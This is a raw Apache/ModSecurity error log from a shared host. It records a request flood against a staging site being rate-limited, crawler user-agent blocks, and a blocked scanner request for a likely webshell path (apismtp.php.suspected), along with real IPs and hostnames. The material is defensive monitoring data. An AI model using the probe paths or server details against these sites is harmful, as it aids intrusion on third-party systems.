[Tue May 26 19:59:07.337749 2026] [security2:error] [pid 93868:tid 94281] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25yngAAAaY"]
[Tue May 26 19:59:07.343380 2026] [security2:error] [pid 93868:tid 94325] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25ymQAAAdI"]
[Tue May 26 19:59:07.364635 2026] [security2:error] [pid 93576:tid 93764] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMmDRMqfxdEDkoszpCAAAADQ"]
[Tue May 26 19:59:07.373809 2026] [security2:error] [pid 93868:tid 94263] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25ytQAAAZQ"]
[Tue May 26 19:59:07.380695 2026] [security2:error] [pid 93868:tid 94329] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25ynQAAAdY"]
[Tue May 26 19:59:07.380877 2026] [security2:error] [pid 93576:tid 93773] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMmDRMqfxdEDkoszpDwAAAD0"]
[Tue May 26 19:59:07.383306 2026] [security2:error] [pid 93868:tid 94266] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25yugAAAZc"]
[Tue May 26 19:59:07.386787 2026] [security2:error] [pid 93576:tid 93835] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMmDRMqfxdEDkoszpGwAAAHs"]
[Tue May 26 19:59:07.389134 2026] [security2:error] [pid 93576:tid 93717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMmDRMqfxdEDkoszpDQAAAAU"]
[Tue May 26 19:59:07.389162 2026] [security2:error] [pid 93868:tid 94318] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25yqwAAAcs"]
[Tue May 26 19:59:07.389982 2026] [security2:error] [pid 93576:tid 93803] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMmDRMqfxdEDkoszpGAAAAFs"]
[Tue May 26 19:59:07.393318 2026] [security2:error] [pid 93576:tid 93829] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMmDRMqfxdEDkoszpEAAAAHU"]
[Tue May 26 19:59:07.396436 2026] [security2:error] [pid 93868:tid 94276] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25ypQAAAaE"]
[Tue May 26 19:59:07.403045 2026] [security2:error] [pid 93576:tid 93775] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMmDRMqfxdEDkoszpFAAAAD8"]
[Tue May 26 19:59:07.405187 2026] [security2:error] [pid 93868:tid 94379] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25yvQAAAgg"]
[Tue May 26 19:59:07.409007 2026] [security2:error] [pid 93868:tid 94373] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25yvwAAAgI"]
[Tue May 26 19:59:07.410498 2026] [security2:error] [pid 93576:tid 93739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMmDRMqfxdEDkoszpEgAAABs"]
[Tue May 26 19:59:07.411001 2026] [security2:error] [pid 93868:tid 94274] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25ywgAAAZ8"]
[Tue May 26 19:59:07.415362 2026] [security2:error] [pid 93868:tid 94296] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25ywQAAAbU"]
[Tue May 26 19:59:07.418543 2026] [security2:error] [pid 93868:tid 94341] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25yrgAAAeI"]
[Tue May 26 19:59:07.421998 2026] [security2:error] [pid 93868:tid 94287] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25yxQAAAaw"]
[Tue May 26 19:59:07.425075 2026] [security2:error] [pid 93868:tid 94299] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25yvAAAAbg"]
[Tue May 26 19:59:07.428454 2026] [security2:error] [pid 93868:tid 94313] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25ywAAAAcY"]
[Tue May 26 19:59:07.433333 2026] [security2:error] [pid 93868:tid 94288] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMkqK9k_ZUB2Vp25yxgAAAa0"]
[Tue May 26 19:59:07.441801 2026] [security2:error] [pid 93576:tid 93780] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMmDRMqfxdEDkoszpHAAAAEQ"]
[Tue May 26 19:59:07.461333 2026] [security2:error] [pid 93576:tid 93738] [client 85.208.96.209:19382] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/2/"] [unique_id "ahWuM2DRMqfxdEDkoszpNQAAABo"]
[Tue May 26 19:59:07.461458 2026] [security2:error] [pid 93576:tid 93738] [client 85.208.96.209:19382] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/2/"] [unique_id "ahWuM2DRMqfxdEDkoszpNQAAABo"]
[Tue May 26 19:59:07.468376 2026] [security2:error] [pid 93868:tid 94338] [client 45.92.1.17:51770] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cicodev.org"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahWuM0qK9k_ZUB2Vp25y3wAAAd8"]
[Tue May 26 19:59:07.492608 2026] [security2:error] [pid 93868:tid 94302] [client 109.248.15.13:43883] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25y0QAAAbs"], referer: https://anujtradingco.com
[Tue May 26 19:59:07.797643 2026] [qos:error] [pid 93576:tid 93793] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuM2DRMqfxdEDkoszpggAAAFE
[Tue May 26 19:59:07.798967 2026] [qos:error] [pid 93868:tid 94271] [client 45.148.10.120:35376] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuM0qK9k_ZUB2Vp25zMgAAAZw
[Tue May 26 19:59:07.799818 2026] [qos:error] [pid 93576:tid 93717] [client 45.148.10.120:35220] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuM2DRMqfxdEDkoszphAAAAAU
[Tue May 26 19:59:07.802656 2026] [qos:error] [pid 93868:tid 94274] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuM0qK9k_ZUB2Vp25zNAAAAZ8
[Tue May 26 19:59:07.803051 2026] [qos:error] [pid 93576:tid 93790] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuM2DRMqfxdEDkoszphwAAAE4
[Tue May 26 19:59:07.804713 2026] [qos:error] [pid 93868:tid 94383] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuM0qK9k_ZUB2Vp25zNgAAAgw
[Tue May 26 19:59:07.805794 2026] [qos:error] [pid 93576:tid 93788] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuM2DRMqfxdEDkoszpiQAAAEw
[Tue May 26 19:59:07.805797 2026] [qos:error] [pid 93576:tid 93794] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuM2DRMqfxdEDkoszpiAAAAFI
[Tue May 26 19:59:07.805828 2026] [qos:error] [pid 93576:tid 93822] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=103, c=50.87.254.159, id=ahWuM2DRMqfxdEDkoszpigAAAG4
[Tue May 26 19:59:07.806832 2026] [qos:error] [pid 93868:tid 94372] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuM0qK9k_ZUB2Vp25zNwAAAgE
[Tue May 26 19:59:08.036479 2026] [qos:error] [pid 93576:tid 93720] [client 45.148.10.120:35336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNGDRMqfxdEDkoszpjgAAAAg
[Tue May 26 19:59:08.037253 2026] [qos:error] [pid 93576:tid 93722] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNGDRMqfxdEDkoszpjwAAAAo
[Tue May 26 19:59:08.037999 2026] [qos:error] [pid 93576:tid 93821] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNGDRMqfxdEDkoszpkAAAAG0
[Tue May 26 19:59:08.038791 2026] [qos:error] [pid 93868:tid 94352] [client 45.148.10.120:35376] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNEqK9k_ZUB2Vp25zRgAAAe0
[Tue May 26 19:59:08.039740 2026] [qos:error] [pid 93576:tid 93760] [client 45.148.10.120:35220] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNGDRMqfxdEDkoszpkQAAADA
[Tue May 26 19:59:08.041464 2026] [qos:error] [pid 93576:tid 93766] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNGDRMqfxdEDkoszpkgAAADY
[Tue May 26 19:59:08.042066 2026] [qos:error] [pid 93576:tid 93750] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNGDRMqfxdEDkoszpkwAAACY
[Tue May 26 19:59:08.042380 2026] [qos:error] [pid 93868:tid 94261] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNEqK9k_ZUB2Vp25zRwAAAZI
[Tue May 26 19:59:08.043867 2026] [qos:error] [pid 93576:tid 93824] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNGDRMqfxdEDkoszplAAAAHA
[Tue May 26 19:59:08.047912 2026] [qos:error] [pid 93576:tid 93827] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNGDRMqfxdEDkoszplQAAAHM
[Tue May 26 19:59:08.185052 2026] [qos:error] [pid 93576:tid 93731] [client 45.148.10.120:35336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNGDRMqfxdEDkoszpmQAAABM
[Tue May 26 19:59:08.186584 2026] [qos:error] [pid 93576:tid 93834] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNGDRMqfxdEDkoszpmgAAAHo
[Tue May 26 19:59:08.188685 2026] [qos:error] [pid 93576:tid 93781] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNGDRMqfxdEDkoszpmwAAAEU
[Tue May 26 19:59:08.189415 2026] [qos:error] [pid 93868:tid 94374] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNEqK9k_ZUB2Vp25zSwAAAgM
[Tue May 26 19:59:08.192712 2026] [qos:error] [pid 93576:tid 93770] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNGDRMqfxdEDkoszpnAAAADo
[Tue May 26 19:59:08.194838 2026] [qos:error] [pid 93576:tid 93798] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNGDRMqfxdEDkoszpnQAAAFY
[Tue May 26 19:59:08.195433 2026] [qos:error] [pid 93576:tid 93779] [client 45.148.10.120:35220] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNGDRMqfxdEDkoszpngAAAEM
[Tue May 26 19:59:08.196306 2026] [qos:error] [pid 93868:tid 94304] [client 45.148.10.120:35376] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNEqK9k_ZUB2Vp25zTAAAAb0
[Tue May 26 19:59:08.197332 2026] [qos:error] [pid 93576:tid 93749] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNGDRMqfxdEDkoszpnwAAACU
[Tue May 26 19:59:08.201462 2026] [qos:error] [pid 93576:tid 93810] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNGDRMqfxdEDkoszpoAAAAGI
[Tue May 26 19:59:08.285604 2026] [security2:error] [pid 93868:tid 94340] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25y5wAAAeE"]
[Tue May 26 19:59:08.300974 2026] [security2:error] [pid 93868:tid 94296] [client 66.146.235.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWuNEqK9k_ZUB2Vp25zUQAAAbU"], referer: https://anujtradingco.com
[Tue May 26 19:59:08.303497 2026] [security2:error] [pid 93576:tid 93828] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM2DRMqfxdEDkoszpPwAAAHQ"]
[Tue May 26 19:59:08.303518 2026] [security2:error] [pid 93576:tid 93813] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM2DRMqfxdEDkoszpQwAAAGU"]
[Tue May 26 19:59:08.308238 2026] [security2:error] [pid 93868:tid 94273] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25y6wAAAZ4"]
[Tue May 26 19:59:08.333119 2026] [security2:error] [pid 93576:tid 93809] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM2DRMqfxdEDkoszpTgAAAGE"]
[Tue May 26 19:59:08.333340 2026] [security2:error] [pid 93868:tid 94381] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25y7gAAAgo"]
[Tue May 26 19:59:08.339467 2026] [security2:error] [pid 93868:tid 94349] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25y8QAAAeo"]
[Tue May 26 19:59:08.347559 2026] [security2:error] [pid 93868:tid 94258] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25y8gAAAY8"]
[Tue May 26 19:59:08.354670 2026] [security2:error] [pid 93868:tid 94377] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25y_gAAAgY"]
[Tue May 26 19:59:08.360390 2026] [security2:error] [pid 93868:tid 94356] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25zAQAAAfE"]
[Tue May 26 19:59:08.369446 2026] [security2:error] [pid 93576:tid 93819] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM2DRMqfxdEDkoszpUAAAAGs"]
[Tue May 26 19:59:08.373547 2026] [security2:error] [pid 93576:tid 93747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM2DRMqfxdEDkoszpTAAAACM"]
[Tue May 26 19:59:08.375716 2026] [security2:error] [pid 93868:tid 94347] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25zCQAAAeg"]
[Tue May 26 19:59:08.375846 2026] [security2:error] [pid 93576:tid 93771] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM2DRMqfxdEDkoszpTwAAADs"]
[Tue May 26 19:59:08.379096 2026] [security2:error] [pid 93576:tid 93836] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM2DRMqfxdEDkoszpVAAAAHw"]
[Tue May 26 19:59:08.388921 2026] [security2:error] [pid 93576:tid 93721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM2DRMqfxdEDkoszpUQAAAAk"]
[Tue May 26 19:59:08.389147 2026] [security2:error] [pid 93868:tid 94369] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25zDwAAAf4"]
[Tue May 26 19:59:08.391846 2026] [security2:error] [pid 93868:tid 94293] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25y_wAAAbI"]
[Tue May 26 19:59:08.399887 2026] [security2:error] [pid 93868:tid 94353] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25zCAAAAe4"]
[Tue May 26 19:59:08.403809 2026] [security2:error] [pid 93868:tid 94346] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM0qK9k_ZUB2Vp25zBgAAAec"]
[Tue May 26 19:59:08.403924 2026] [security2:error] [pid 93576:tid 93804] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuM2DRMqfxdEDkoszpVQAAAFw"]
